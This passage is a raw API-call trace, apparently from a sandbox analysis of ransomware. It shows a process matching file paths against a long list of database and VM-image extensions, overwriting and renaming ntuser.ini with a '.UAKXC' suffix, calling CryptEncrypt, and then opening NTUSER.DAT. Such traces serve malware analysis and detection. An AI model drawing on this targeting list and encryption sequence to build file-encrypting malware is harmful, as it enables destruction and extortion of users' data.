HALPmcxz\\ntuser.ini", lpSrch=".cpd") returned 0x0 [0144.594] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".dacpac") returned 0x0 [0144.594] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".dad") returned 0x0 [0144.594] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".dadiagrams") returned 0x0 [0144.594] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".daschema") returned 0x0 [0144.594] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".db") returned 0x0 [0144.594] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".db-shm") returned 0x0 [0144.594] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".db-wal") returned 0x0 [0144.594] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".db3") returned 0x0 [0144.594] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".dbc") returned 0x0 [0144.594] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".dbf") returned 0x0 [0144.594] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".dbs") returned 0x0 [0144.595] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".dbt") returned 0x0 [0144.595] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".dbv") returned 0x0 [0144.595] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".dbx") returned 0x0 [0144.595] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".dcb") returned 0x0 [0144.595] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".dct") returned 0x0 [0144.595] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".dcx") returned 0x0 [0144.595] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".ddl") returned 0x0 [0144.595] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".dlis") returned 0x0 [0144.595] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".dp1") returned 0x0 [0144.595] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".dqy") returned 0x0 [0144.595] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".dsk") returned 0x0 [0144.595] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".dsn") returned 0x0 [0144.595] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".dtsx") returned 0x0 [0144.595] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".dxl") returned 0x0 [0144.595] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".eco") returned 0x0 [0144.595] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".ecx") returned 0x0 [0144.595] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".edb") returned 0x0 [0144.595] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".epim") returned 0x0 [0144.595] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".exb") returned 0x0 [0144.595] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".fcd") returned 0x0 [0144.595] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".fdb") returned 0x0 [0144.595] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".fic") returned 0x0 [0144.595] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".fmp") returned 0x0 [0144.595] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".fmp12") returned 0x0 [0144.595] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".fmpsl") returned 0x0 [0144.595] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".fol") returned 0x0 [0144.595] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".fp3") returned 0x0 [0144.595] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".fp4") returned 0x0 [0144.596] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".fp5") returned 0x0 [0144.596] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".fp7") returned 0x0 [0144.596] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".fpt") returned 0x0 [0144.596] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".frm") returned 0x0 [0144.596] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".gdb") returned 0x0 [0144.596] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".grdb") returned 0x0 [0144.596] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".gwi") returned 0x0 [0144.596] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".hdb") returned 0x0 [0144.596] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".his") returned 0x0 [0144.596] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".ib") returned 0x0 [0144.596] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".idb") returned 0x0 [0144.596] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".ihx") returned 0x0 [0144.596] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".itdb") returned 0x0 [0144.596] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".itw") returned 0x0 [0144.596] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".jet") returned 0x0 [0144.596] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".jtx") returned 0x0 [0144.596] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".kdb") returned 0x0 [0144.596] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".kexi") returned 0x0 [0144.596] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".kexic") returned 0x0 [0144.596] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".kexis") returned 0x0 [0144.597] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".lgc") returned 0x0 [0144.597] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".lwx") returned 0x0 [0144.597] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".maf") returned 0x0 [0144.597] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".maq") returned 0x0 [0144.597] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".mar") returned 0x0 [0144.597] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".mas") returned 0x0 [0144.597] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".mav") returned 0x0 [0144.597] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".mdb") returned 0x0 [0144.597] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".mdf") returned 0x0 [0144.597] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".mpd") returned 0x0 [0144.597] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".mrg") returned 0x0 [0144.597] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".mud") returned 0x0 [0144.597] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".mwb") returned 0x0 [0144.597] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".myd") returned 0x0 [0144.597] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".ndf") returned 0x0 [0144.597] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".nnt") returned 0x0 [0144.597] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".nrmlib") returned 0x0 [0144.597] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".ns2") returned 0x0 [0144.597] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".ns3") returned 0x0 [0144.597] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".ns4") returned 0x0 [0144.597] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".nsf") returned 0x0 [0144.597] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".nv") returned 0x0 [0144.597] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".nv2") returned 0x0 [0144.597] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".nwdb") returned 0x0 [0144.597] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".nyf") returned 0x0 [0144.597] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".odb") returned 0x0 [0144.597] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".oqy") returned 0x0 [0144.597] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".orx") returned 0x0 [0144.598] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".owc") returned 0x0 [0144.598] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".p96") returned 0x0 [0144.598] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".p97") returned 0x0 [0144.598] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".pan") returned 0x0 [0144.598] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".pdb") returned 0x0 [0144.598] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".pdm") returned 0x0 [0144.598] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".pnz") returned 0x0 [0144.598] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".qry") returned 0x0 [0144.598] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".qvd") returned 0x0 [0144.598] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".rbf") returned 0x0 [0144.598] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".rctd") returned 0x0 [0144.598] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".rod") returned 0x0 [0144.598] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".rodx") returned 0x0 [0144.598] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".rpd") returned 0x0 [0144.598] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".rsd") returned 0x0 [0144.598] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".sas7bdat") returned 0x0 [0144.598] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".sbf") returned 0x0 [0144.598] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".scx") returned 0x0 [0144.598] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".sdb") returned 0x0 [0144.598] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".sdc") returned 0x0 [0144.598] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".sdf") returned 0x0 [0144.598] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".sis") returned 0x0 [0144.598] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".spq") returned 0x0 [0144.598] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".sql") returned 0x0 [0144.598] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".sqlite") returned 0x0 [0144.598] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".sqlite3") returned 0x0 [0144.598] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".sqlitedb") returned 0x0 [0144.598] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".te") returned 0x0 [0144.599] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".temx") returned 0x0 [0144.599] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".tmd") returned 0x0 [0144.599] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".tps") returned 0x0 [0144.599] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".trc") returned 0x0 [0144.599] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".trm") returned 0x0 [0144.599] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".udb") returned 0x0 [0144.599] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".udl") returned 0x0 [0144.599] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".usr") returned 0x0 [0144.599] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".v12") returned 0x0 [0144.599] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".vis") returned 0x0 [0144.599] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".vpd") returned 0x0 [0144.599] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".vvv") returned 0x0 [0144.599] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".wdb") returned 0x0 [0144.599] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".wmdb") returned 0x0 [0144.599] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".wrk") returned 0x0 [0144.599] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".xdb") returned 0x0 [0144.599] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".xld") returned 0x0 [0144.599] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".xmlff") returned 0x0 [0144.599] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".abcddb") returned 0x0 [0144.599] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".abs") returned 0x0 [0144.599] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".abx") returned 0x0 [0144.599] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".accdw") returned 0x0 [0144.599] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".adn") returned 0x0 [0144.599] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".db2") returned 0x0 [0144.599] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".fm5") returned 0x0 [0144.599] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".hjt") returned 0x0 [0144.599] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".icg") returned 0x0 [0144.600] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".icr") returned 0x0 [0144.600] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".kdb") returned 0x0 [0144.600] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".lut") returned 0x0 [0144.600] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".maw") returned 0x0 [0144.600] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".mdn") returned 0x0 [0144.600] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".mdt") returned 0x0 [0144.600] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".vdi") returned 0x0 [0144.600] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".vhd") returned 0x0 [0144.600] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".vmdk") returned 0x0 [0144.600] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".pvm") returned 0x0 [0144.600] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".vmem") returned 0x0 [0144.600] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".vmsn") returned 0x0 [0144.600] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".vmsd") returned 0x0 [0144.600] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".nvram") returned 0x0 [0144.600] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".vmx") returned 0x0 [0144.600] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".raw") returned 0x0 [0144.600] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".qcow2") returned 0x0 [0144.600] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".subvol") returned 0x0 [0144.600] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".bin") returned 0x0 [0144.600] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".vsv") returned 0x0 [0144.600] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".avhd") returned 0x0 [0144.600] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".vmrs") returned 0x0 [0144.600] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".vhdx") returned 0x0 [0144.600] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".avdx") returned 0x0 [0144.600] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".vmcx") returned 0x0 [0144.600] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".iso") returned 0x0 [0144.600] SetFilePointerEx (in: hFile=0x6d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.601] WriteFile (in: hFile=0x6d0, lpBuffer=0x373fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x373fc78, lpOverlapped=0x0 | out: lpBuffer=0x373fd70*, lpNumberOfBytesWritten=0x373fc78*=0x20c, lpOverlapped=0x0) returned 1 [0144.602] WriteFile (in: hFile=0x6d0, lpBuffer=0x373fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x373fc7c, lpOverlapped=0x0 | out: lpBuffer=0x373fc80*, lpNumberOfBytesWritten=0x373fc7c*=0xa, lpOverlapped=0x0) returned 1 [0144.602] SetEndOfFile (hFile=0x6d0) returned 1 [0144.602] SetFilePointerEx (in: hFile=0x6d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.602] ReadFile (in: hFile=0x6d0, lpBuffer=0x4100000, nNumberOfBytesToRead=0x14, lpNumberOfBytesRead=0x373fc88, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesRead=0x373fc88*=0x14, lpOverlapped=0x0) returned 1 [0144.603] SetFilePointerEx (in: hFile=0x6d0, liDistanceToMove=0xffffffec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.603] WriteFile (in: hFile=0x6d0, lpBuffer=0x4100000*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x373fc44, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesWritten=0x373fc44*=0x14, lpOverlapped=0x0) returned 1 [0144.603] CloseHandle (hObject=0x6d0) returned 1 [0144.605] GetProcessHeap () returned 0xea0000 [0144.605] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x7793048 [0144.606] lstrcpyW (in: lpString1=0x7793048, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" [0144.606] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpString2=".UAKXC" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.UAKXC") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.UAKXC" [0144.606] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.UAKXC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini.uakxc")) returned 1 [0144.607] GetProcessHeap () returned 0xea0000 [0144.607] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7793048 | out: hHeap=0xea0000) returned 1 [0144.608] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec698 | out: hHeap=0xea0000) returned 1 [0144.608] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2bc8 | out: hHeap=0xea0000) returned 1 [0144.608] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0144.608] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0144.608] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0144.609] GetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT" (normalized: "c:\\users\\default\\ntuser.dat")) returned 0x2026 [0146.009] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT" (normalized: "c:\\users\\default\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f0 [0146.010] GetLastError () returned 0x0 [0146.010] GetFileSizeEx (in: hFile=0x6f0, lpFileSize=0x373fc88 | out: lpFileSize=0x373fc88*=786432) returned 1 [0146.010] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".4dd") returned 0x0 [0146.010] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".4dl") returned 0x0 [0146.010] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".accdb") returned 0x0 [0146.010] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".accdc") returned 0x0 [0146.010] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".accde") returned 0x0 [0146.010] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".accdr") returned 0x0 [0146.010] StrStrIW 